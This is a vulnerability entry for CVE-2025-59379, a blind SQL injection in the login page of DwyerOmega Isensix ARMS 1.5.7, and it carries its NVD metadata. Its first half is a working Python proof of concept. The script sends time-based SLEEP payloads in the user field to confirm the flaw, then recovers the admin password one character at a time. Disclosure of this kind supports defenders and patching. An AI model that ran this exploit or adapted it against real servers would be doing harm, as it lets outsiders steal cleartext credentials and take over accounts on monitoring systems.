CVE-2025-59379

import requests import time import string target_url = "http://target-arms-server/login" def blind_sql_injection_test(): # Test for blind SQL injection vulnerability # This PoC demonstrates extracting admin password character by character charset = string.ascii_lowercase + string.digits + string.punctuation extracted_password = "" print("[*] Testing for Blind SQL Injection vulnerability...") # Test payload to confirm vulnerability (time-based) test_payload_true = "admin' AND (SELECT COUNT(*) FROM users) > 0 AND SLEEP(5)--" test_payload_false = "admin' AND (SELECT COUNT(*) FROM users) < 0 AND SLEEP(5)--" start = time.time() requests.post(target_url, data={"user": test_payload_true, "password": "test"}) true_time = time.time() - start start = time.time() requests.post(target_url, data={"user": test_payload_false, "password": "test"}) false_time = time.time() - start if true_time > 4 and false_time < 2: print("[+] Blind SQL Injection vulnerability confirmed!") # Extract password character by character for position in range(1, 33): # Assuming 32 char password max for char in charset: payload = f"admin' AND (SELECT SUBSTRING(password,{position},1) FROM users WHERE username='admin')='{char}' AND SLEEP(3)--" start = time.time() requests.post(target_url, data={"user": payload, "password": "test"}) elapsed = time.time() - start if elapsed > 2: extracted_password += char print(f"[+] Position {position}: {char} (Password so far: {extracted_password})") break print(f"\n[+] Extracted admin password: {extracted_password}") else: print("[-] Vulnerability not detected or target not vulnerable") if __name__ == "__main__": blind_sql_injection_test()

{"cve": {"id": "CVE-2025-59379", "sourceIdentifier": "[email protected]", "published": "2026-01-06T16:15:51.377", "lastModified": "2026-01-29T01:41:41.610", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "DwyerOmega Isensix Advanced Remote Monitoring System (ARMS) 1.5.7 allows an attacker to retrieve sensitive information from the underlying SQL database via Blind SQL Injection through the user parameter in the login page. This allows an attacker to steal credentials, which may be cleartext, from existing users (and admins) and use them to authenticate to the application."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dwyeromega:isensix_advanced_remote_monitoring_system_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.5.7", "matchCriteriaId": "2F1DAF0D-2D05-4692-B5E1-303D9DF6E96D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dwyeromega:isensix_advanced_remote_monitoring_system:-:*:*:*:*:*:*:*", "matchCriteriaId": "71213DB0-0D78-403E-BE7D-784F86B28568"}]}]}], "references": [{"url": "https://github.com/PilotPatrickk/Published-CVEs/blob/main/CVE-2025-59379.md", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://info.dwyeromega.com/brands", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://isensix.com/guardian/", "source": "[email protected]", "tags": ["Product"]}]}}